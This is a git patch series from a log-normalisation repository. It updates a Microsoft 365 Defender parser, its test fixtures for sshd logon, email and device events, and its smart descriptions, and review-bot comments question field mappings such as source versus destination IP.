-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "executable": "/usr/sbin/sshd", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "sshd", + "parent": { + "name": "sshd", + "pid": 3653343, + "start": "2024-11-18T10:07:20.290000Z" + }, + "pid": 3653343, + "start": "2024-11-18T10:07:20.293930Z", + "user": { + "domain": "domain", + "name": "root" + }, + 
"working_directory": "/usr/sbin" + }, + "related": { + "hash": [ + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account" + ] + }, + "user": { + "domain": "domain", + "name": "account" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json new file mode 100644 index 000000000..11ca88986 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json 
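Review bot: The fixture asserts the input's `RemoteIP` (`1.2.3.4`) under `destination.ip` / `destination.address`. For a `LogonFailed` event with `LogonType: Network` whose initiating process is `sshd`, the remote address is the peer that attempted the logon, which ECS conventionally carries in `source.ip`; detection content that counts failed logons per `source.ip` would not see these events at all. The mapping itself lives in the parser, outside this commit, but this expected block is what locks it in, so the direction is worth confirming before merging; `user.name` / `related.user` (`account`) and `event.category: authentication` look right.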
@@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": 
"{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:40Z", + "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + 
"DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "3162398878", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "company.com", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@company.com" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<1@eu-west-1.test.com>", + "subject": "MAIL subject", + "to": { + "address": [ + "alan.smithee@company.com" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json new file mode 100644 index 000000000..d3b7b8c2f --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json 
@@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": 
"{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + 
"DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "2633942188", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "test.fr", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@test.fr" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<20241028141819.43623347A8F@test.fr>", + "subject": "EMAIL Subject", + "to": { + "address": [ + "alan.smithee@test.fr" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file From 94649a4b22251fe173eb508355223e3f8e67a851 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 12:16:03 +0100 Subject: [PATCH 089/150] Enhanced smart descriptions --- .../_meta/smart-descriptions.json | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json index 6232e66f8..2d1728daa 100644 --- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json +++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json @@ -9,6 +9,17 @@ { "field": "action.type" } ] }, + { + "value": "New {action.type} incident received: {microsoft.defender.investigation.name}", + "conditions": [ + { + "field": "event.dataset", + "value": "cloud_app_events" + }, + { "field": "action.type" }, + { "field": "microsoft.defender.investigation.name" } + ] + }, { "value": "New incident {microsoft.defender.investigation.name}: {email.attachments.file.name} with hash {email.attachments.file.hash.sha256}", "conditions": [ 
From 1bb05b973e9cb21fae745b7ce6eabd0f184a55eb Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 13:55:16 +0100 Subject: [PATCH 090/150] Deleted device_events exceptions --- .../microsoft-365-defender/ingest/parser.yml | 4 +- ...test_device_event_sensitive_file_read.json | 81 +++++++++---------- .../tests/test_device_events_2.json | 11 ++- ..._device_events_shell_link_create_file.json | 74 +++++++++-------- .../tests/test_device_process_created.json | 8 +- .../test_devices_events_script_content.json | 11 ++- 6 files changed, 91 insertions(+), 98 deletions(-) diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index f60d9b6f0..0a33f577f 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
@@ -41,9 +41,9 @@ pipeline: output_field: "data" - name: set_common_fields - name: set_process_events - filter: '{{json_event.message.get("category") not in ["AdvancedHunting-DeviceProcessEvents", "AdvancedHunting-DeviceEvents"] or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}' + filter: '{{json_event.message.get("category") != "AdvancedHunting-DeviceProcessEvents"}}' - name: set_process_deviceprocess_events - filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents" or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() not in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", 
"exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}' + filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents"}}' - name: set_alert_evidence_fields filter: '{{json_event.message.get("category") == "AdvancedHunting-AlertEvidence"}}' - name: set_alert_info_fields diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json index fedd99aea..413d002c1 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json 
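Review bot: The two replaced filters are now exact complements of one string comparison, but nothing on the line records why AdvancedHunting-DeviceProcessEvents is the only category routed to set_process_deviceprocess_events, and the fixture hunks in this same commit (test_device_event_sensitive_file_read.json, test_device_events_shell_link_create_file.json) show the consequence: for AdvancedHunting-DeviceEvents the InitiatingProcess* attributes move from `process.parent.*` to `process.*`. Any rule or saved search keyed on `process.parent.command_line` for DeviceEvents stops matching silently, so the filter deserves a comment such as `# DeviceProcessEvents describe a created child process, so InitiatingProcess* is the parent; every other category (DeviceEvents included) describes the acting process, so InitiatingProcess* maps to process.*` plus a changelog entry. The updated test_device_events_2.json and test_devices_events_script_content.json fixtures also now expect `process.parent.pid: 0`; if that is a 0 parent id from the source event it is presumably a "no parent" placeholder, and emitting it as a real pid looks unintended — worth confirming in the set_process_events stage, which lies outside this hunk.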
@@ -24,18 +24,16 @@ "properties": { "AccountSid": "S-1-2-3", "process": { - "parent": { - "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", - "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", - "FileSize": 3316224, - "LogonId": "5223047", - "VersionInfoCompanyName": "Test Corporation", - "VersionInfoFileDescription": "Browser EXE", - "VersionInfoInternalFileName": "Browser.EXE", - "VersionInfoOriginalFileName": "Browser.EXE", - "VersionInfoProductName": "Test Product", - "VersionInfoProductVersion": "1, 0, 0, 1" - } + "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "FileSize": 3316224, + "LogonId": "5223047", + "VersionInfoCompanyName": "Test Corporation", + "VersionInfoFileDescription": "Browser EXE", + "VersionInfoInternalFileName": "Browser.EXE", + "VersionInfoOriginalFileName": "Browser.EXE", + "VersionInfoProductName": "Test Product", + "VersionInfoProductVersion": "1, 0, 0, 1" } }, "type": "SensitiveFileRead" 
@@ -57,37 +55,38 @@ } }, "process": { - "name": "FileName.mdb", + "args": [ + "/DBMode", + "/Network", + "/ProjectID", + "/Ticket", + "0", + "0", + "12345678-1234-5678-9012-345678901234", + "123456789" + ], + "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "executable": "c:\\program files (x86)\\browser.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "browser.exe", "parent": { - "args": [ - "/DBMode", - "/Network", - "/ProjectID", - "/Ticket", - "0", - "0", - "12345678-1234-5678-9012-345678901234", - "123456789" - ], - "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", - "executable": "c:\\program files (x86)\\browser.exe", - "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" - }, - "name": "browser.exe", - "pid": 1328, - "start": "2024-11-12T10:17:23.990532Z", - "user": { - "domain": "company", - "email": "USERNAME@COMPANY.COM", - "id": "S-1-2-3", - "name": "username" - }, - "working_directory": "c:\\program files (x86)" + "name": "Windows.exe", + "pid": 1820, + "start": "2024-10-14T05:47:54.324381Z" + }, + "pid": 1328, + "start": "2024-11-12T10:17:23.990532Z", + "user": { + "domain": "company", + "email": "USERNAME@COMPANY.COM", + "id": "S-1-2-3", + "name": "username" }, - "working_directory": "C:" + "working_directory": "c:\\program files (x86)" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json index 494baa569..4964dae1f 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json 
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json @@ -17,9 +17,7 @@ "action": { "properties": { "process": { - "parent": { - "LogonId": "0" - } + "LogonId": "0" } }, "type": "ScriptContent" @@ -42,9 +40,10 @@ }, "process": { "parent": { - "pid": 417271, - "start": "2024-10-22T15:09:08.624070Z" - } + "pid": 0 + }, + "pid": 417271, + "start": "2024-10-22T15:09:08.624070Z" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json index 37a646715..48696c644 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json @@ -23,18 +23,16 @@ "action": { "properties": { "process": { - "parent": { - "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", - "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", - "FileSize": 1621656, - "LogonId": "8066492", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft Word", - "VersionInfoInternalFileName": "WinWord", - "VersionInfoOriginalFileName": "WinWord.exe", - "VersionInfoProductName": "Microsoft Office", - "VersionInfoProductVersion": "16.0.17928.20216" - } + "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", + "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "FileSize": 1621656, + "LogonId": "8066492", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Word", + "VersionInfoInternalFileName": "WinWord", + "VersionInfoOriginalFileName": "WinWord.exe", + "VersionInfoProductName": "Microsoft Office", + "VersionInfoProductVersion": "16.0.17928.20216" } }, "type": "ShellLinkCreateFileEvent" 
@@ -60,34 +58,34 @@ } }, "process": { - "name": "FILENAME.LNK", + "args": [ + "\"\"", + "\"I:\\COMPANY\\Service\\FILE.doc\"", + "/n", + "/o" + ], + "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "winword.exe", "parent": { - "args": [ - "\"\"", - "\"I:\\COMPANY\\Service\\FILE.doc\"", - "/n", - "/o" - ], - "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", - "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe", - "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" - }, - "name": "winword.exe", - "pid": 20948, - "start": "2024-11-12T10:02:28.777910Z", - "user": { - "domain": "company", - "email": "JOHNDOE@COMPANY.COM", - "id": "S-1-2-3", - "name": "jdoe" - }, - "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16" + "name": "explorer.exe", + "pid": 14616, + "start": "2024-11-12T08:47:41.952077Z" + }, + "pid": 20948, + "start": "2024-11-12T10:02:28.777910Z", + "user": { + "domain": "company", + "email": "JOHNDOE@COMPANY.COM", + "id": "S-1-2-3", + "name": "jdoe" }, - "start": "2024-11-06T16:05:23.113802Z", - "working_directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office" + "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json index 7acf31f01..cd2ca7981 100644 
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json @@ -29,11 +29,9 @@ } }, "process": { - "parent": { - "user": { - "domain": "autorite nt", - "name": "syst\u00e8me" - } + "user": { + "domain": "autorite nt", + "name": "syst\u00e8me" } } } diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json index 72f93da4e..c632ebbfa 100644 --- a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json +++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json @@ -17,9 +17,7 @@ "action": { "properties": { "process": { - "parent": { - "LogonId": "0" - } + "LogonId": "0" } }, "type": "ScriptContent" @@ -42,9 +40,10 @@ }, "process": { "parent": { - "pid": 423638, - "start": "2024-10-22T15:09:47.165481Z" - } + "pid": 0 + }, + "pid": 423638, + "start": "2024-10-22T15:09:47.165481Z" }, "related": { "hash": [ From 3c5af0dd65f309e8d14b9d0a538745160ca82713 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Mon, 25 Nov 2024 12:09:53 +0200 Subject: [PATCH 091/150] Fixes and improvements --- .../trend-micro-vision-one/_meta/manifest.yml | 2 +- Trend Micro/trend-micro-vision-one/ingest/parser.yml | 10 ++++++++-- .../tests/test_internal_network_scanner.json | 8 +++----- .../trend-micro-vision-one/tests/test_process.json | 12 ++++++++---- .../trend-micro-vision-one/tests/test_registry.json | 12 +++++++----- 5 files changed, 27 insertions(+), 17 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml index 8363b7b96..da8360194 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml +++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml 
